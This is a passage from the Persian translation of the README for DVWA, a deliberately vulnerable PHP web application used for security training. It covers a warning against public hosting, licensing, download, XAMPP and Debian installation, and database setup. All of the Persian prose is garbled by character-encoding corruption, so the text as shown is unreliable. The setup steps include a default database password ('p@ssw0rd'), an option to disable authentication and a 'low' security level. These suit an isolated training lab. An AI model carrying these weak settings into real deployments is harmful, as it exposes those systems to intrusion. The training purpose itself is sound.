دشŲˆØ§ØąÛŒ**، با بŲ‡ØąØ§â€ŒÚ¯ÛŒØąÛŒ Ø§Ø˛ یڊ ØąØ§Ø¨Øˇ ØŗØąØąØ§ØŗØĒ Ųˆ ØĸØŗاŲ† اØŗØĒ. Ų„ØˇŲØ§Ų‹ Ø¯Øą Ų†Ø¸Øą داشØĒŲ‡â€ŒØ¨Ø§Ø´ÛŒØ¯ ÚŠŲ‡ Ø¯Øą ایŲ† Ų†ØąŲ…‌اŲØ˛Ø§Øą **Ų‡Ų… Ų†ŲŲˆØ°ŲžØ°ÛŒØąÛŒâ€ŒŲ‡Ø§ÛŒ Ų…ØŗØĒŲ†Ø¯â€ŒØŗØ§Ø˛ÛŒâ€ŒØ´Ø¯Ų‡ Ųˆ Ų‡Ų… ØēÛŒØąŲ…ØŗØĒŲ†Ø¯ØŗØ§Ø˛ÛŒâ€ŒØ´Ø¯Ų‡** ŲˆØŦŲˆØ¯ Ø¯Ø§ØąŲ†Ø¯. ایŲ† Ų…ŲˆØļŲˆØš ØĒØšŲ…دی اØŗØĒ. Ø§Ø˛ Ø´Ų…ا دؚŲˆØĒ Ų…ی‌شŲˆØ¯ ÚŠŲ‡ ØĒŲ„اش ÚŠŲ†ÛŒØ¯ Ųˆ اشڊاŲ„اØĒ ØąØ§ ØĒا Ų‡ØąØĸŲ†Ų‚Ø¯Øą ÚŠŲ‡ Ų…ÛŒØŗØą اØŗØĒ بیابید. +- - - +## Ų‡Ø´Ø¯Ø§Øą! +اŲžŲ„یڊیشŲ† ŲˆØ¨ÛŒ ŲˆØ­Ø´ØĒŲ†Ø§ÚŠ ØĸØŗیب‌ŲžØ°ÛŒØąØŒ بŲ‡â€Œ Ø´ÚŠŲ„ ŲˆØ­Ø´ØĒŲ†Ø§ÚŠÛŒ ØĸØŗیب‌ŲžØ°ÛŒØą اØŗØĒ! **ØĸŲ† ØąØ§ Ø¯Øą ŲžŲˆØ´Ų‡â€ŒŲ‡Ø§ÛŒ اچ‌ØĒی‌اŲ…‌اŲ„ ØšŲ…ŲˆŲ…ÛŒ ØŗØąŲˆÛŒØŗ دŲ‡Ų†Ø¯Ų‡Ų” Ų…ÛŒØ˛Ø¨Ø§Ų†ÛŒ ØŽŲˆØ¯ یا Ų‡Øą ØŗØąŲˆØąÛŒ ÚŠŲ‡ Ø¯Øą ایŲ†ØĒØąŲ†ØĒ Ų‚ØąØ§Øą Ø¯Ø§ØąØ¯ Ø¨Ø§ØąÚ¯Ø°Ø§ØąÛŒ Ų†ÚŠŲ†ÛŒØ¯**، Ú†ØąØ§ÚŠŲ‡ Ų…ŲˆØąØ¯ Ų†ŲŲˆØ° Ų‚ØąØ§Øą ØŽŲˆØ§Ų‡Ų†Ø¯ Ú¯ØąŲØĒ. Ø¨ØąØ§ÛŒ ایŲ† ÚŠØ§Øą اØŗØĒŲØ§Ø¯Ų‡ Ø§Ø˛ یڊ Ų…اشیŲ† Ų…ØŦØ§Ø˛ÛŒ ŲžÛŒØ´Ų†Ų‡Ø§Ø¯ Ų…ی‌شŲˆØ¯ (Ų…ØĢŲ„ [ŲˆØąÚ†ŲˆØ§Ų„ باڊØŗ](https://www.virtualbox.org/) یا [ŲˆÛŒâ€ŒØ§Ų…‌ŲˆÛŒØą](https://www.vmware.com/)) ÚŠŲ‡ Ø¯Øą حاŲ„ØĒ شبڊŲ‡â€ŒØ§ÛŒ NAT ŲžÛŒÚŠØąØ¨Ų†Ø¯ÛŒ شدŲ‡ باشد. Ø¯Øą دا؎Ų„ Ų…اشیŲ† Ų…ØŦØ§Ø˛ÛŒ Ų…ی‌ØĒŲˆØ§Ų†ÛŒØ¯ [Ø˛Ų…Ųž](https://www.apachefriends.org/) ØąØ§ Ø¨ØąØ§ÛŒ ØŗØąŲˆØą ŲˆØ¨ Ųˆ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡Ų” ØŽŲˆØ¯ داŲ†Ų„ŲˆØ¯ ÚŠŲ†ÛŒØ¯. + +### ØĒڊذیب‌Ų†Ø§Ų…Ų‡ +Ų…ا Ø¯Øą Ų…ŲˆØąØ¯ ایŲ†ÚŠŲ‡ Ø§Ø˛ ایŲ† اŲžŲ„یڊیشŲ† (DVWA) چگŲˆŲ†Ų‡ اØŗØĒŲØ§Ø¯Ų‡ Ų…ی‌شŲˆØ¯ Ų‡ÛŒÚ† Ų…ØŗؤŲˆŲ„ÛŒØĒی Ų†Ų…ی‌ŲžØ°ÛŒØąÛŒŲ…. Ų…ا Ų‡Ø¯Ų ایŲ† Ø¨ØąŲ†Ø§Ų…Ų‡ ØąØ§ بŲ‡ ØĩØąØ§Ø­ØĒ بیاŲ† ÚŠØąØ¯Ų‡â€ŒØ§ÛŒŲ… Ųˆ Ø§Ø˛ ØĸŲ† Ų†Ø¨Ø§ÛŒØ¯ Ø¨ØąØ§ÛŒ Ų…Ų‚اØĩد بد؎ŲˆØ§Ų‡Ø§Ų†Ų‡ اØŗØĒŲØ§Ø¯Ų‡ Ø´ŲˆØ¯. Ų…ا Ų‡Ø´Ø¯Ø§ØąŲ‡Ø§ Ųˆ اŲ‚داŲ…اØĒ ØŽŲˆØ¯ ØąØ§ Ø¯Øą ØŦŲ‡ØĒ ØŦŲ„ŲˆÚ¯ÛŒØąÛŒ Ø§Ø˛ Ų†Øĩب DVWA Ø¨Øą ØąŲˆÛŒ ØŗØąŲˆÛŒØŗ‌دŲ‡Ų†Ø¯Ú¯Ø§Ų† ŲˆØ¨ Ø¨ØąØŽØˇ اŲ†ØŦاŲ… دادŲ‡â€ŒØ§ÛŒŲ…. Ø§Ú¯Øą بŲ‡ ØŗØąŲˆØą ŲˆØ¨ Ø´Ų…ا Ø§Ø˛ ØˇØąÛŒŲ‚ یڊ Ų†ØŗØŽŲ‡ Ø§Ø˛ DVWA Ų†ŲŲˆØ° شد، ØĒŲ‚ØĩÛŒØąÛŒ Ų…ØĒŲˆØŦŲ‡ Ų…ا Ų†ÛŒØŗØĒ. Ų…ØŗؤŲˆŲ„ÛŒØĒ ØĸŲ† Ø¨Øą ØšŲ‡Ø¯Ų‡Ų” ÚŠØŗی اØŗØĒ ÚŠŲ‡ ØĸŲ† ØąØ§ Ø¨Ø§ØąÚ¯Ø°Ø§ØąÛŒ Ųˆ Ų†Øĩب ÚŠØąØ¯Ų‡ اØŗØĒ. +- - - +## Ų…ØŦŲˆØ˛ +ایŲ† ŲØ§ÛŒŲ„ ب؎شی Ø§Ø˛ اŲžŲ„یڊیشŲ† ŲˆØ¨ÛŒ ŲˆØ­Ø´ØĒŲ†Ø§ÚŠ ØĸØŗیب‌ŲžØ°ÛŒØą (DVWA) اØŗØĒ. +اŲžŲ„یڊیشŲ† ŲˆØ¨ÛŒ ŲˆØ­Ø´ØĒŲ†Ø§ÚŠ ØĸØŗیب‌ŲžØ°ÛŒØą (DVWA) یڊ Ų†ØąŲ…‌اŲØ˛Ø§Øą ØĸØ˛Ø§Ø¯ اØŗØĒ. Ø´Ų…ا Ų…ی‌ØĒŲˆØ§Ų†ÛŒØ¯ ØĸŲ† ØąØ§ ØĒØ­ØĒ Ų…ØŦŲˆØ˛ Ų†ØŗØŽŲ‡ ØŗŲˆŲ…‌ یا بŲ‡â€ŒØ§ØŽØĒÛŒØą ØŽŲˆØ¯ØĒاŲ† Ų†ØŗØŽŲ‡â€ŒŲ‡Ø§ÛŒ ØŦدید‌ØĒØąÛŒ Ø§Ø˛ Ų…ØŦŲˆØ˛ ØšŲ…ŲˆŲ…ÛŒ Ú¯Ų†Ųˆ (GNU) ÚŠŲ‡ ØĒŲˆØŗØˇ بŲ†ÛŒØ§Ø¯ Ų†ØąŲ…‌اŲØ˛Ø§Øą ØĸØ˛Ø§Ø¯ Ų…Ų†Ø´Øą شدŲ‡ اØŗØĒ، ØĒŲˆØ˛ÛŒØš ÚŠŲ†ÛŒØ¯ Ųˆ/یا ØĒØēÛŒÛŒØą دŲ‡ÛŒØ¯. +اŲžŲ„یڊیشŲ† ŲˆØ¨ÛŒ ŲˆØ­Ø´ØĒŲ†Ø§ÚŠ ØĸØŗیب‌ŲžØ°ÛŒØą (DVWA) بŲ‡ اŲ…ید ایŲ†ÚŠŲ‡ ØŗŲˆØ¯Ų…Ų†Ø¯ ŲˆØ§Ų‚Øš Ø´ŲˆØ¯ ØĒŲˆØ˛ÛŒØš شدŲ‡ اØŗØĒ، Ų„یڊŲ† بدŲˆŲ† Ų‡ÛŒÚ†Ú¯ŲˆŲ†Ų‡ ØĒØļŲ…ÛŒŲ†ÛŒØŒ Ø­ØĒی بŲ‡ ØĩŲˆØąØĒ ØļŲ…Ų†ÛŒ ÚŠŲ‡ Ø¨ØąØ§ÛŒ Ų…Ų‚اØĩد ؎اØĩی Ų…Ų†Ø§Øŗب باشد Ø§ØąØ§ØĻŲ‡ Ų…ی‌شŲˆØ¯. Ų…ØŦŲˆØ˛ ØšŲ…ŲˆŲ…ÛŒ Ú¯Ų†Ųˆ ØąØ§ Ø¨ØąØ§ÛŒ Ø§ØˇŲ„اؚاØĒ بیشØĒØą ببیŲ†ÛŒØ¯. +Ø´Ų…ا Ų…ی‌بایØŗØĒ یڊ ØąŲˆŲ†ŲˆØ´ØĒ Ø§Ø˛ Ų…ØŦŲˆØ˛ ØšŲ…ŲˆŲ…ÛŒ Ú¯Ų†Ųˆ ØąØ§ Ų‡Ų…ØąØ§ با اŲžŲ„یڊیشŲ† ŲˆØ¨ÛŒ ŲˆØ­Ø´ØĒŲ†Ø§ÚŠ ØĸØŗیب‌ŲžØ°ÛŒØą (DVWA) Ø¯ØąÛŒØ§ŲØĒ ÚŠØąØ¯Ų‡â€ŒØ¨Ø§Ø´ÛŒØ¯. Ø§Ú¯Øą ایŲ† اØĒŲØ§Ų‚ Ų†ÛŒŲØĒادŲ‡ اØŗØĒ، ØąØ§ ببیŲ†ÛŒØ¯. + +- - - +## بیŲ†â€ŒØ§Ų„Ų…Ų„Ų„ÛŒ ÚŠØąØ¯Ų† + +ایŲ† ŲØ§ÛŒŲ„ بŲ‡ Ø˛Ø¨Ø§Ų†â€ŒŲ‡Ø§ÛŒ Ų…ØŽØĒŲ„Ų Ø¯ÛŒÚ¯ØąÛŒ Ų…ŲˆØŦŲˆØ¯ اØŗØĒ: +- اŲ†Ú¯Ų„ÛŒØŗی: [English](README.md) (Ų†ØŗØŽŲ‡Ų” Ų…ØąØŦØš) +- ØĒØąÚŠÛŒ: [TÃŧrkçe](README.tr.md) +- چیŲ†ÛŒ: [įŽ€äŊ“中文](README.zh.md) +- ØšØąØ¨ÛŒ: [اŲ„ØšØąØ¨ŲŠØŠ](README.ar.md) +- ŲØąØ§Ų†ØŗŲˆÛŒ: [French](README.fr.md) + +Ø§Ú¯Øą Ø´Ų…ا Ų†ÛŒØ˛ Ų…ی‌؎ŲˆØ§Ų‡ÛŒØ¯ بŲ‡ ØĒØąØŦŲ…Ų‡â€ŒÚŠØąØ¯Ų† ایŲ† Ų…ØŗØĒŲ†Ø¯ بŲ‡ Ø˛Ø¨Ø§Ų†â€ŒŲ‡Ø§ÛŒ Ø¯ÛŒÚ¯Øą ÚŠŲ…ÚŠ ÚŠŲ†ÛŒØ¯ØŒ Ų„ØˇŲØ§Ų‹ یڊ PR‌ Ø§ØąØŗاŲ„ ÚŠŲ†ÛŒØ¯. ایŲ† بداŲ† Ų…ØšŲ†Ø§ Ų†ÛŒØŗØĒ ÚŠŲ‡ ŲØ§ÛŒŲ„ ØąØ§ بŲ‡ ØĒØąØŦŲ…Ų‡â€ŒÚ¯Øą Ú¯ŲˆÚ¯Ų„ بدŲ‡ÛŒØ¯ Ųˆ ØŽØąŲˆØŦی ØĸŲ† ØąØ§ Ø§ØąØŗاŲ„ ÚŠŲ†ÛŒØ¯ØŒ ایŲ†Ú¯ŲˆŲ†Ų‡ ØĒØąØŦŲ…Ų‡â€Œâ€Œâ€ŒŲ‡Ø§ Ų…ØąØ¯ŲˆØ¯ Ų…ی‌شŲˆŲ†Ø¯. + +- - - +## داŲ†Ų„ŲˆØ¯ +Ø¯Øą حاŲ„یڊŲ‡ Ų…Ų…ÚŠŲ† اØŗØĒ Ų†ØŗØŽŲ‡â€ŒŲ‡Ø§ÛŒ Ų…ØĒŲØ§ŲˆØĒی Ø§Ø˛ DVWA Ø¯Øą Ø§ØˇØąØ§Ų ŲžØąØ§ÚŠŲ†Ø¯Ų‡ شدŲ‡ باشŲ†Ø¯ØŒ ØĒŲ†Ų‡Ø§ Ų†ØŗØŽŲ‡ ŲžØ´ØĒیباŲ†ÛŒ شدŲ‡ØŒØĸØŽØąÛŒŲ† Ų†ØŗØŽŲ‡ Ø§Ø˛ Ų…ØŽØ˛Ų† ØąØŗŲ…ÛŒ گیØĒ‌Ų‡Ø§Ø¨ اØŗØĒ. Ø´Ų…ا یا Ų…ی‌ØĒŲˆØ§Ų†ÛŒØ¯ ØĸŲ† ØąØ§ Ø§Ø˛ ØˇØąÛŒŲ‚ ÚŠŲ„ŲˆŲ† ÚŠØąØ¯Ų† Ų…ØŽØ˛Ų†: + +``` +git clone https://github.com/digininja/DVWA.git +``` + +یا [Ø¨Ø§ØąÚ¯ÛŒØąÛŒ Ų†ØŗØŽŲ‡Ų” Ø˛ÛŒŲžâ€ŒØ´Ø¯Ų‡Ų” ŲØ§ÛŒŲ„Ų‡Ø§](https://github.com/digininja/DVWA/archive/master.zip) داŲ†Ų„ŲˆØ¯ ÚŠŲ†ÛŒØ¯. + +- - - + +## Ų†Øĩب + +### ŲˆÛŒØ¯ØĻŲˆâ€ŒŲ‡Ø§ÛŒ Ų†Øĩب + +- [Ų†Øĩب Ø¨Øą ڊاŲ„ی‌Ų„ÛŒŲ†ŲˆÚŠØŗ Ø¯Øą ŲˆØąÚ†ŲˆØ§Ų„‌باڊØŗ](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- [Ų†Øĩب Ø¯Øą ŲˆÛŒŲ†ŲˆØ˛ با اØŗØĒŲØ§Ø¯Ų‡ Ø§Ø˛ Ø˛Ų…Ųž](https://youtu.be/Yzksa_WjnY0) +- [Ų†Øĩب Ø¨Øą ØąŲˆÛŒ ŲˆÛŒŲ†Ø¯ŲˆØ˛ ÛąÛ°](https://www.youtube.com/watch?v=cak2lQvBRAo) + +### ŲˆÛŒŲ†Ø¯ŲˆØ˛+Ø˛Ų…Ųž +Ø§Ú¯Øą Ø¯Øą حاŲ„ حاØļØą یڊ ŲˆØ¨â€ŒØŗØąŲˆØą ØąØ§Ų‡â€ŒØ§Ų†Ø¯Ø§Ø˛ÛŒâ€ŒØ´Ø¯Ų‡ Ø¯Øą ا؎ØĒÛŒØ§Øą Ų†Ø¯Ø§ØąÛŒØ¯ØŒ ØąØ§Ø­ØĒ‌ØĒØąÛŒŲ† ØąŲˆØ´ Ų†Øĩب DVWA Ø§Ø˛ ØˇØąÛŒŲ‚ داŲ†Ų„ŲˆØ¯ Ųˆ Ų†Øĩب [Ø˛Ų…Ųž](https://www.apachefriends.org/) اØŗØĒ + +Ø˛Ų…Ųž یڊ ØĒŲˆØ˛ÛŒØš Ø§Ø˛ ØĸŲžØ§Ú†ÛŒ اØŗØĒ ÚŠŲ‡ Ų†Øĩب بØŗÛŒØ§Øą ØĸØŗاŲ†ÛŒ Ø¯Ø§ØąØ¯ Ųˆ Ø¨ØąØ§ÛŒ Ų„ÛŒŲ†ŲˆÚŠØŗ، ØŗŲˆŲ„Ø§ØąÛŒØŗ، ŲˆÛŒŲ†Ø¯ŲˆØ˛ Ųˆ Ų…ڊ‌اŲˆâ€ŒØ§Øŗ‌ اڊØŗ ØšØąØļŲ‡ شدŲ‡ اØŗØĒ. ایŲ† بØŗØĒŲ‡ شاŲ…Ų„ ØŗØąŲˆÛŒØŗ‌دŲ‡Ų†Ø¯Ų‡Ų” ŲˆØ¨ ØĸŲžØ§Ú†ÛŒØŒ Ų…ای‌اØŗ‌ڊیŲˆØ§Ų„ØŒ ŲžÛŒâ€ŒØ§Ú†â€ŒŲžÛŒØŒ ŲžØąŲ„ØŒ یڊ ØŗØąŲˆÛŒØŗ‌دŲ‡Ų†Ø¯Ų‡Ų” اŲâ€Œâ€ŒØĒی‌ŲžÛŒ Ųˆ ŲžÛŒâ€ŒØ§ØŦ‌ŲžÛŒâ€ŒŲ…ای‌ادŲ…ÛŒŲ† اØŗØĒ. +ایŲ† [ŲˆÛŒØ¯ØĻŲˆ](https://youtu.be/Yzksa_WjnY0) Ø´Ų…ا ØąØ§ Ų‚دŲ… بŲ‡ Ų‚دŲ… Ø¯Øą Ų…ØąØ§Ø­Ų„ Ų†Øĩب ØĸŲ† Ø¨ØąØ§ÛŒ ŲˆÛŒŲ†Ø¯ŲˆØ˛ Ų‡Ø¯Ø§ÛŒØĒ Ų…ی‌ڊŲ†Ø¯ØŒ اŲ„بØĒŲ‡ Ø¨ØąØ§ÛŒ ØŗØ§ÛŒØą ØŗیØŗØĒŲ…‌ؚاŲ…Ų„‌Ų‡Ø§ Ų†ÛŒØ˛ ÚŠŲ…ابیش بŲ‡ Ų‡Ų…ÛŒŲ†â€Œ Ø´ÚŠŲ„ اØŗØĒ. + + + +### ŲØ§ÛŒŲ„ ڊاŲ†ŲÛŒÚ¯ +Ø¨ØąŲ†Ø§Ų…Ų‡Ų” DVWA Ų‡Ų…ØąØ§ با یڊ ŲØ§ÛŒŲ„ ڊاŲ†ŲÛŒÚ¯ دŲ…‌دØŗØĒی ØĒŲˆØ˛ÛŒØš Ų…ی‌شŲˆØ¯ ÚŠŲ‡ Ų„Ø§Ø˛Ų… اØŗØĒ Ø´Ų…ا ØĸŲ† ØąØ§ Ø¯Øą ØŦای Ų…Ų†Ø§Øŗب ÚŠŲžÛŒ ÚŠŲ†ÛŒØ¯ Ųˆ ØĒØēÛŒÛŒØąØ§ØĒ Ų„Ø§Ø˛Ų… ØąØ§ Ø¨Øą ØąŲˆÛŒ ØĸŲ† اؚŲ…اŲ„ ÚŠŲ†ÛŒØ¯. Ø¯Øą Ų„ÛŒŲ†ŲˆÚŠØŗ با ŲØąØļ Ø¨Øą ایŲ†ÚŠŲ‡ Ø¯Øą ŲžŲˆØ´Ų‡Ų” DVWAŲ‚ØąØ§Øą Ø¯Ø§ØąÛŒØ¯ØŒ بŲ‡ ایŲ† ØˇØąÛŒŲ‚ Ų…ی‌ØĒŲˆØ§Ų†ÛŒØ¯ ŲØ§ÛŒŲ„ ØąØ§ ÚŠŲžÛŒ ÚŠŲ†ÛŒØ¯: + +`cp config/config.inc.php.dist config/config.inc.php` + +Ø¯Øą ŲˆÛŒŲ†Ø¯ŲˆØ˛ØŒ Ø§Ú¯Øą ŲžØŗŲˆŲ†Ø¯ ŲØ§ÛŒŲ„‌Ų‡Ø§ Ų…ØŽŲÛŒ باشد، ÚŠØ§Øą اŲ†Ø¯ÚŠÛŒ دشŲˆØ§ØąØĒØą Ų…ی‌شŲˆØ¯. Ø§Ú¯Øą Ø¯Øą ایŲ† Ų…ŲˆØąØ¯ Ų…ØˇŲ…ØĻŲ† Ų†ÛŒØŗØĒید، Ø¨ØąØ§ÛŒ ØĒŲˆØļیحاØĒ بیشØĒØą ایŲ† ŲžØŗØĒ ŲˆØ¨Ų„اگ ØąØ§ ببیŲ†ÛŒØ¯: + +[چگŲˆŲ†Ų‡ بŲ‡ ŲˆÛŒŲ†Ø¯ŲˆØ˛ بگŲˆÛŒÛŒŲ… ŲžØŗŲˆŲ†Ø¯ ŲØ§ÛŒŲ„‌Ų‡Ø§ ØąØ§ Ų†Ų…ایش دŲ‡Ø¯](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/) + +### ŲžÚŠÛŒØŦ‌Ų‡Ø§ÛŒ Ų„ÛŒŲ†ŲˆÚŠØŗ + +Ø§Ú¯Øą Ø§Ø˛ یڊ ØĒŲˆØ˛ÛŒØš Ų„ÛŒŲ†ŲˆÚŠØŗ Ų…بØĒŲ†ÛŒ Ø¨Øą دبیاŲ† اØŗØĒŲØ§Ø¯Ų‡ Ų…ÛŒ ÚŠŲ†ÛŒØ¯ØŒ Ų„Ø§Ø˛Ų… اØŗØĒ بØŗØĒŲ‡â€ŒŲ‡Ø§ÛŒ Ų†ØąŲ…‌اŲØ˛Ø§ØąÛŒ Ø˛ÛŒØą _(یا Ų…شابŲ‡ ØĸŲ†Ų‡Ø§)_ ØąØ§ Ų†Øĩب ÚŠŲ†ÛŒØ¯: + +- apache2 +- libapache2-mod-php +- mariadb-server +- mariadb-client +- php php-mysqli +- php-gd + +ØŦŲ‡ØĒ Ø§ØˇŲ…ÛŒŲ†Ø§Ų† Ø§Ø˛ ایڊŲ†ÚŠŲ‡ ØĸØŽØąÛŒŲ† Ų†ØŗØŽŲ‡ Ø§Ø˛ Ų‡Ų…Ų‡â€ŒÚ†ÛŒØ˛ ØąØ§ Ø¯ØąÛŒØ§ŲØĒ ØŽŲˆØ§Ų‡ÛŒØ¯ ÚŠØąØ¯ØŒ اØŦØąØ§ÛŒ یڊ Update‌ Ų‚بŲ„ Ø§Ø˛ Ų‡Øą ÚŠØ§ØąÛŒ ØĒŲˆØĩیŲ‡ Ų…ی‌شŲˆØ¯. + +``` +apt update +apt install -y apache2 mariadb-server mariadb-client php php-mysqli php-gd libapache2-mod-php +``` +ØŗایØĒ با Ų…ای‌اØŗÚŠÛŒŲˆØ§Ų„ بØŦای Ų…Ø§ØąÛŒØ§â€ŒØ¯ÛŒâ€ŒØ¨ÛŒ ÚŠØ§Øą Ų…ی‌ڊŲ†Ø¯ØŒ اŲ…ا Ų…ا Ų‚ŲˆÛŒØ§Ų‹ Ų…Ø§ØąÛŒØ§Ø¯â€ŒÛŒâ€ŒØ¨ÛŒ ØąØ§ ØĒŲˆØĩیŲ‡ Ų…ی‌ڊŲ†ÛŒŲ…ØŒ Ú†ØąØ§ ÚŠŲ‡ بدŲˆŲ† Ų†ÛŒØ§Ø˛ بŲ‡ ØĒØēÛŒÛŒØąØ§ØĒ Ų…ØŗØĒŲ‚ÛŒŲ…ا ÚŠØ§Øą ØŽŲˆØ§Ų‡Ø¯ ÚŠØąØ¯ Ø¯Øą حاŲ„ÛŒŲ‡ Ø¨ØąØ§ÛŒ ØąØ§Ų‡â€ŒØ§Ų†Ø§ØŽØĒŲ† Øĩحیح Ų…ای‌اØŗ‌ڊیŲˆâ€ŒØ§Ų„ Ų†ÛŒØ§Ø˛ اØŗØĒ ØĒØēÛŒÛŒØąØ§ØĒی Ø¯Øą ØĸŲ† بدŲ‡ÛŒØ¯. + + +### Ų†Øĩب ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ +Ø¨ØąØ§ÛŒ Ų†Øĩب ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ڊاŲÛŒØŗØĒ Ø¨Øą ØąŲˆÛŒ دڊŲ…Ų‡Ų” `Setup DVWA` Ø¯Øą Ų…Ų†ŲˆÛŒ اØĩŲ„ÛŒ ÚŠŲ„یڊ ÚŠŲ†ÛŒØ¯ Ųˆ ŲžØŗ Ø§Ø˛ ØĸŲ† دڊŲ…Ų‡Ų” `Create / Reset Database` ØąØ§ ŲØ´Ø§Øą دŲ‡ÛŒØ¯. ایŲ† ÚŠØ§Øą ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ØąØ§ بŲ‡ Ų‡Ų…ØąØ§Ų‡ Ų…Ų‚Ø¯Ø§ØąÛŒ دادŲ‡ Ø¯Øą ØĸŲ† ایØŦاد/Ø¨Ø§Ø˛ØŗØ§Ø˛ÛŒ Ų…ی‌ڊŲ†Ø¯. +Ø§Ú¯Øą Ø¯Øą حیŲ† Øŗا؎ØĒŲ† ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ØŽØˇØ§ÛŒÛŒ Ø¯ØąÛŒØ§ŲØĒ Ų…ی‌ڊŲ†ÛŒØ¯ØŒ Ų…ØˇŲ…ØĻŲ† باشید Ø§ØˇŲ„اؚاØĒ اؚØĒØ¨Ø§ØąØŗŲ†ØŦی ØĒŲ†Ø¸ÛŒŲ…‌شدŲ‡ Ø¯Øą `./config/config.inc.php` Øĩحیح باشد. *‌دŲ‚ØĒ ÚŠŲ†ÛŒØ¯ ÚŠŲ‡ ایŲ† ŲØ§ÛŒŲ„ با config.inc.php.dis ÚŠŲ‡ ØĩØąŲØ§Ų‹ یڊ ŲØ§ÛŒŲ„ Ų†Ų…ŲˆŲ†Ų‡ اØŗØĒ ØĒŲØ§ŲˆØĒ Ø¯Ø§ØąØ¯.* + +Ų…ØĒØēÛŒØąŲ‡Ø§ بŲ‡ ØĩŲˆØąØĒ ŲžÛŒØ´â€ŒŲØąØļ با Ų…Ų‚Ø§Ø¯ÛŒØą Ø˛ÛŒØą ØĒŲ†Ø¸ÛŒŲ… Ų…ی‌شŲˆŲ†Ø¯: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306'; +$_DVWA[ 'db_user' ] = 'dvwa'; +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +دŲ‚ØĒ ÚŠŲ†ÛŒØ¯ ÚŠŲ‡ØŒ Ø§Ú¯Øą Ø§Ø˛ Ų…Ø§ØąÛŒØ§Ø¯ÛŒâ€ŒØ¨ÛŒ بØŦای Ų…ای‌اØŗ‌ڊیŲˆâ€ŒØ§Ų„ اØŗØĒŲØ§Ø¯Ų‡ Ų…ی‌ڊŲ†ÛŒØ¯ (Ø¯Øą ڊاŲ„ی‌Ų„بŲ†ŲˆÚŠØŗ Ų…Ø§ØąÛŒØ§Ø¯ÛŒâ€ŒØ¨ÛŒ ŲžÛŒØ´â€ŒŲØąØļ اØŗØĒ)، Ų†ØŽŲˆØ§Ų‡ÛŒØ¯ ØĒŲˆØ§Ų†ØŗØĒ Ø§Ø˛ ÚŠØ§ØąØ¨Øą root‌ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ اØŗØĒŲØ§Ø¯Ų‡ ÚŠŲ†ÛŒØ¯ Ųˆ Ų…ی‌بایØŗØĒ ÚŠØ§ØąØ¨Øą ØŦدیدی ایØŦاد ÚŠŲ†ÛŒØ¯. Ø¨ØąØ§ÛŒ ایŲ† ÚŠØ§Øą با ÚŠØ§ØąØ¨Øą ØąŲˆØĒ بŲ‡ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ŲˆØĩŲ„ Ø´ŲˆÛŒØ¯ Ųˆ دØŗØĒŲˆØąØ§ØĒ Ø˛ÛŒØą ØąØ§ اØŦØąØ§ ÚŠŲ†ÛŒØ¯: + +```mysql +mysql> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +mysql> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +mysql> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +mysql> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### ØēÛŒØą ŲØšØ§Ų„ ÚŠØąØ¯Ų† ŲˆØąŲˆØ¯ +بؚØļی Ø§Ø˛ Ø§Ø¨Ø˛Ø§ØąŲ‡Ø§ با ب؎ش ŲˆØąŲˆØ¯ بŲ‡ ØŽŲˆØ¨ÛŒ ÚŠØ§Øą Ų†Ų…ی‌ڊŲ†Ų†Ø¯ Ųˆ با DVWA Ų†Ų…ی‌ØĒŲˆØ§Ų†Ų†Ø¯ اØŗØĒŲØ§Ø¯Ų‡ Ø´ŲˆŲ†Ø¯. Ø¨ØąØ§ÛŒ ØąŲØš ایŲ† Ų…Ø´ÚŠŲ„ØŒ Ú¯Ø˛ÛŒŲ†Ų‡â€ŒØ§ÛŒ Ø¯Øą ڊاŲ†ŲÛŒÚ¯ ŲˆØŦŲˆØ¯ Ø¯Ø§ØąØ¯ ÚŠŲ‡ بØĒŲˆØ§Ų†ÛŒØ¯ ÚŠŲ†ØĒØąŲ„ ŲˆØąŲˆØ¯ ØąØ§ ØēÛŒØą ŲØšØ§Ų„ ÚŠŲ†ÛŒØ¯. Ø¨ØąØ§ÛŒ ایŲ† ÚŠØ§Øą ڊاŲÛŒØŗØĒ ØĒŲ†Ø¸ÛŒŲ… Ø˛ÛŒØą ØąØ§ Ø¯Øą ŲØ§ÛŒŲ„ ڊاŲ†ŲÛŒÚ¯ اŲ†ØŦاŲ… دŲ‡ÛŒØ¯: + +```php +$_DVWA[ 'disable_authentication' ] = true; +``` + +Ų‡Ų…Ú†Ų†ÛŒŲ† Ų„Ø§Ø˛Ų… اØŗØĒ ØŗØˇØ­ اŲ…Ų†ÛŒØĒ ØąØ§ بŲ‡ Ų…Ų‚Ø¯Ø§ØąÛŒ ÚŠŲ‡ Ø¨ØąØ§ÛŒ ØĸØ˛Ų…ŲˆŲ†ØĒاŲ† Ų…د Ų†Ø¸Øą Ø¯Ø§ØąÛŒØ¯ ØĒØēÛŒÛŒØą دŲ‡ÛŒØ¯: + + +```php +$_DVWA[ 'default_security_level' ] = 'low'; +``` + +Ø¯Øą ایŲ† حاŲ„ØĒ Ø´Ų…ا Ų…ی‌ØĒŲˆØ§Ų†ÛŒØ¯ Ø§Ø˛ ØĒŲ…اŲ…ÛŒ اŲ…ڊاŲ†Ø§ØĒ بدŲˆŲ† Ų†ÛŒØ§Ø˛ بŲ‡ ŲˆØąŲˆØ¯ Ųˆ ØĒŲ†Ø¸ÛŒŲ… ÚŠŲˆÚŠÛŒâ€ŒŲ‡Ø§ بŲ‡ØąŲ‡ ببید. + +### ØŗØ§ÛŒØą ØĒŲ†Ø¸ÛŒŲ…اØĒ +بØŗØĒŲ‡ بŲ‡ ØŗیØŗØĒŲ… ؚاŲ…Ų„ Ųˆ 